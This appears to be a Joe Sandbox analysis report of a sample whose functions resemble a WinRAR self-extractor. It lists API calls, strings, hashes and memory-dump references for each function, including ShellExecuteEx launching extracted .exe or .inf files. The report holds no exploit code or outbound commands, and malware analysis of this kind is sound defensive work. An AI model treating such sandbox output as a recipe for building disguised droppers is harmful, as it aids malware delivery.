Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

Part of subcall function 00FBD4D4: GetDlgItem.USER32(00000068,00FFFCB8), ref: 00FBD4E8
Part of subcall function 00FBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00FBAF07,00000001,?,?,00FBB7B9,00FD506C,00FFFCB8,00FFFCB8,00001000,00000000,00000000), ref: 00FBD510
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FBD51B
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FD35F4), ref: 00FBD529
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD53F
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FBD559
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD59D
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FBD5AB
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD5BA
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD5E1
Part of subcall function 00FBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FD43F4), ref: 00FBD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FBBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00FBBA90
GetTickCount.KERNEL32 ref: 00FBBAAE
_swprintf.LIBCMT ref: 00FBBAC2
GetLastError.KERNEL32(?,00000011), ref: 00FBBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00FBBB43
_swprintf.LIBCMT ref: 00FBBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00FBBBD0
GetCommandLineW.KERNEL32 ref: 00FBBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00FBBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00FBBC6F
Sleep.KERNEL32(00000064), ref: 00FBBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00FBBCE2
CloseHandle.KERNEL32(00000000), ref: 00FBBCEB
_swprintf.LIBCMT ref: 00FBBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBBD7D
SetDlgItemTextW.USER32(?,00000065,00FD35F4), ref: 00FBBD94
GetDlgItem.USER32(?,00000065), ref: 00FBBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00FBBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FBBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBBE68
_wcslen.LIBCMT ref: 00FBBEBE
_swprintf.LIBCMT ref: 00FBBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00FBBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00FBBF4C
GetDlgItem.USER32(?,00000068), ref: 00FBBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00FBBF6B
GetDlgItem.USER32(?,00000066), ref: 00FBBF85
SetWindowTextW.USER32(00000000,00FEA472), ref: 00FBBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00FBC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00FBC0BD
EnableWindow.USER32(00000000,00000000), ref: 00FBC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00FBC1D9

Part of subcall function 00FBC73F: __EH_prolog.LIBCMT ref: 00FBC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FBC1FD

Strings

%s, xrefs: 00FBBED8
LICENSEDLG, xrefs: 00FBC0B2
__tmp_rar_sfx_access_check_%u, xrefs: 00FBBAB5
<, xrefs: 00FBBB84
STARTDLG, xrefs: 00FBB801
C:\Users\user\Desktop, xrefs: 00FBBBC9
winrarsfxmappingfile.tmp, xrefs: 00FBBBA6
@, xrefs: 00FBBB91
-el -s2 "-d%s" "-sp%s", xrefs: 00FBBB6B
"%s"%s, xrefs: 00FBBD0D

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: e2302f3f352eb2c583e782a5aae0a2120ef87cda73970c47f2abd7784d736b7e
Instruction ID: fb55e69740b7a9d5ef377fc11df44a7f4a1842c5c6277e310186aaf95b0351bc
Opcode Fuzzy Hash: e2302f3f352eb2c583e782a5aae0a2120ef87cda73970c47f2abd7784d736b7e
Instruction Fuzzy Hash: 1542F671D44248BEEB22EBB19C4AFFE3B6CAB01710F044055F644AA1D2CBB99945FF61

Function 00FB0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00FB087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FB088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FB08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FB0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FB0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00FD3C7C,00000000), ref: 00FB0BB1
CloseHandle.KERNEL32(00000000), ref: 00FB0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FB0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00FD3C7C,?,00000000,?,00000800), ref: 00FB0C72
GetFileAttributesW.KERNELBASE(?,?,00FD3C7C,00000800,?,00000000,?,00000800), ref: 00FB0C9C
GetFileAttributesW.KERNEL32(?,?,00FD3D44,00000800), ref: 00FB0CD8

Part of subcall function 00FB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
Part of subcall function 00FB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858

_swprintf.LIBCMT ref: 00FB0D4A
_swprintf.LIBCMT ref: 00FB0D96

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

AllocConsole.KERNEL32 ref: 00FB0D9E
GetCurrentProcessId.KERNEL32 ref: 00FB0DA8
AttachConsole.KERNEL32(00000000), ref: 00FB0DAF
_wcslen.LIBCMT ref: 00FB0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FB0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00FB0DDC
Sleep.KERNEL32(00002710), ref: 00FB0DE7
FreeConsole.KERNEL32 ref: 00FB0DED
ExitProcess.KERNEL32 ref: 00FB0DF5

Strings

uxtheme.dll, xrefs: 00FB0D17
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00FB0D84
DXGIDebug.dll, xrefs: 00FB08FC, 00FB0C5E
SetDllDirectoryW, xrefs: 00FB0888
kernel32, xrefs: 00FB0873
SetDefaultDllDirectories, xrefs: 00FB08B9
dwmapi.dll, xrefs: 00FB0927, 00FB0D0D

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 252dc802b3570be85327090c8f6c5146579e228a6ebcd92b55580c3c0f0343b9
Instruction ID: 7547a19c88db13223e0000d5e55a5a269a652a7fa68b8cc1ffe6be1eb82bad1f
Opcode Fuzzy Hash: 252dc802b3570be85327090c8f6c5146579e228a6ebcd92b55580c3c0f0343b9
Instruction Fuzzy Hash: 9ED193B1408388ABD3219F60884DBDFBBEABF85704F54491EF28596351CB749648EF63

Function 00FBC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00FBC744

Part of subcall function 00FBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FBB3FB

_wcslen.LIBCMT ref: 00FBCA0A
_wcslen.LIBCMT ref: 00FBCA13
SetWindowTextW.USER32(?,?), ref: 00FBCA71
_wcslen.LIBCMT ref: 00FBCAB3
_wcsrchr.LIBVCRUNTIME ref: 00FBCBFB
GetDlgItem.USER32(?,00000066), ref: 00FBCC36
SetWindowTextW.USER32(00000000,?), ref: 00FBCC46
SendMessageW.USER32(00000000,00000143,00000000,00FEA472), ref: 00FBCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FBCC7F

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00FBCB1A
ProgramFilesDir, xrefs: 00FBCB45
%s.%d.tmp, xrefs: 00FBC940
<br>, xrefs: 00FBC9D4

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: ff0f19bf14259db9e81b812be6ba5fb3988eeea00455c50316fe73a76dcb50b4
Instruction ID: 53023e39e1089c9ee4cf2230b0ce9144da2bf5d4ae8f535efbe796d16795e891
Opcode Fuzzy Hash: ff0f19bf14259db9e81b812be6ba5fb3988eeea00455c50316fe73a76dcb50b4
Instruction Fuzzy Hash: 4DE183B2D00119AADF25DBA1DD95EEF77BCAF04350F0480A6F609E7041EB789E44AF61

Function 00FADA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FADA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FADAAC

Part of subcall function 00FAC29A: _wcslen.LIBCMT ref: 00FAC2A2

Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0

Part of subcall function 00FB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FABAE9,00000000,?,?,?,00010416), ref: 00FB1BA0

_wcslen.LIBCMT ref: 00FADDE9
__fprintf_l.LIBCMT ref: 00FADF1C

Strings

R, xrefs: 00FADC0C
*messages***, xrefs: 00FADBFA
,, xrefs: 00FADF57
a, xrefs: 00FADC16
, xrefs: 00FADD6C
*messages***, xrefs: 00FADBC1
$%s:, xrefs: 00FADEFF
@%s:, xrefs: 00FADF06, 00FADF12
RTL, xrefs: 00FADEDE

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 1e128f7586fc2735d2b635173acf323b0d6f7e1a2044ebb09f9aae665a1e86b4
Instruction ID: f1f3ca9d232522d0ab8a5182d3d0f60503d4a2742f53ad5874145ac335e5d21d
Opcode Fuzzy Hash: 1e128f7586fc2735d2b635173acf323b0d6f7e1a2044ebb09f9aae665a1e86b4
Instruction Fuzzy Hash: 8232F3B29002199BCF24EF64CC42BEE77A9FF06310F44452AF90697291EBB5DD84EB50

Function 00FBD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
Part of subcall function 00FBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
Part of subcall function 00FBB568: IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
Part of subcall function 00FBB568: TranslateMessage.USER32(?), ref: 00FBB5AC
Part of subcall function 00FBB568: DispatchMessageW.USER32(?), ref: 00FBB5B6

GetDlgItem.USER32(00000068,00FFFCB8), ref: 00FBD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00FBAF07,00000001,?,?,00FBB7B9,00FD506C,00FFFCB8,00FFFCB8,00001000,00000000,00000000), ref: 00FBD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FBD51B
SendMessageW.USER32(00000000,000000C2,00000000,00FD35F4), ref: 00FBD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FBD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FBD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00FD43F4), ref: 00FBD5F0

Strings

\, xrefs: 00FBD549

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 572df2e4eb4c867db881a4b97f40af47e1435b0f394d98d5ebc47ea0c9733281
Instruction ID: ea7b8e9a817eac1ff2d5c5c429a10cc7a841d8d3e25730fe2a5210cbd1b84fe6
Opcode Fuzzy Hash: 572df2e4eb4c867db881a4b97f40af47e1435b0f394d98d5ebc47ea0c9733281
Instruction Fuzzy Hash: FC31E471145346AFE322DF20DC5AFAB7FACFB86314F000518F5919A1C0EB7989059BB6

Function 00FBD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00FBD7AE
ShellExecuteExW.SHELL32(?), ref: 00FBD8DE
ShowWindow.USER32(?,00000000), ref: 00FBD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00FBD959
CloseHandle.KERNEL32(?), ref: 00FBD97F
ShowWindow.USER32(?,00000001), ref: 00FBD9E1

Strings

.inf, xrefs: 00FBD89A
.exe, xrefs: 00FBD989

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 7188ebdb399f63fa46d61d31049be5f99a10628d947674bb10b0a5cb08572ffe
Instruction ID: ea492fc948bd084ed040ca2d8d0d9197d8f9f10edaffcd3d4242887f13bd49a5
Opcode Fuzzy Hash: 7188ebdb399f63fa46d61d31049be5f99a10628d947674bb10b0a5cb08572ffe
Instruction Fuzzy Hash: 0251E1709043849AEB319B269844BEBBBE5AF82764F08041EF5C097191F775C948FF53

Function 00FCA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FC5695,00FC5695,?,?,?,00FCABAC,00000001,00000001,2DE85006), ref: 00FCA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00FCAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FCAB35
__freea.LIBCMT ref: 00FCAB42

Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38

__freea.LIBCMT ref: 00FCAB4B
__freea.LIBCMT ref: 00FCAB70

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 16f85ec7b66646a2ab47e50b7c35b8f87fc94571471512c4dccb0a0b7b668577
Instruction ID: b4aa0b5dfd9ef857399f538f04cc0d0bda764a4609f6975db8ef970095210476
Opcode Fuzzy Hash: 16f85ec7b66646a2ab47e50b7c35b8f87fc94571471512c4dccb0a0b7b668577
Instruction Fuzzy Hash: BD51D672A0021BABDB254F64CE47FABB7AAEB84768F15462DFC04D6140DB34EC50E651

Function 00FC3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00FC3C35,?,?,01002088,00000000,?,00FC3D60,00000004,InitializeCriticalSectionEx,00FD6394,InitializeCriticalSectionEx,00000000), ref: 00FC3C03

Strings

api-ms-, xrefs: 00FC3BC3

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: c3ec840a4ff450f810a0d76a7dd03aa5ed39ddd932f5df48b401f0337a1a4695
Instruction ID: dc4c46a01b3631c386055ae9071665cef063e66d560fa1e39392e8cc1815bbb0
Opcode Fuzzy Hash: c3ec840a4ff450f810a0d76a7dd03aa5ed39ddd932f5df48b401f0337a1a4695
Instruction Fuzzy Hash: B8112332E05226ABCB228B688D46F4D37A49F457B0F214115F911FB280E330EF00BAD1

Function 00FBAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
Part of subcall function 00FB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858

OleInitialize.OLE32(00000000), ref: 00FBAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FBAC66
SHGetMalloc.SHELL32(00FE8438), ref: 00FBAC70

Strings

3Ro, xrefs: 00FBAC47
riched20.dll, xrefs: 00FBAC1E

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 284eafb04ec7636ecb2e4b59854f0b2431b05b5f6a11b6c9badc1a7730c4eedf
Instruction ID: 531181c1efd46a4f2cc074d8fd77c36126b1063998f77e6716581f8af52ff25a
Opcode Fuzzy Hash: 284eafb04ec7636ecb2e4b59854f0b2431b05b5f6a11b6c9badc1a7730c4eedf
Instruction Fuzzy Hash: EDF0FFB1900209AFCB11AFAAD8499DFFFFCEF84700F004156A455A2245DBB856059FA1

Function 00FA98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00FA7760,?,00000005,?,00000011), ref: 00FA995F
GetLastError.KERNEL32(?,?,00FA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00FA7760,?,00000005,?), ref: 00FA99A2
GetLastError.KERNEL32(?,?,00FA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA99F9

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 069974f70d9ea48f7cc7028c595a59fb40cd56084f7baf173e76771ba2ffe870
Instruction ID: feb5d8c4341cb618ced64b54bd2c7fefb111623065e14d3e685cf1eef9db305b
Opcode Fuzzy Hash: 069974f70d9ea48f7cc7028c595a59fb40cd56084f7baf173e76771ba2ffe870
Instruction Fuzzy Hash: 373115B09483457FE7209B24CC46BDBBB94BB4A330F100B2DF5A1961D1D7E49944EB91

Function 00FBB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
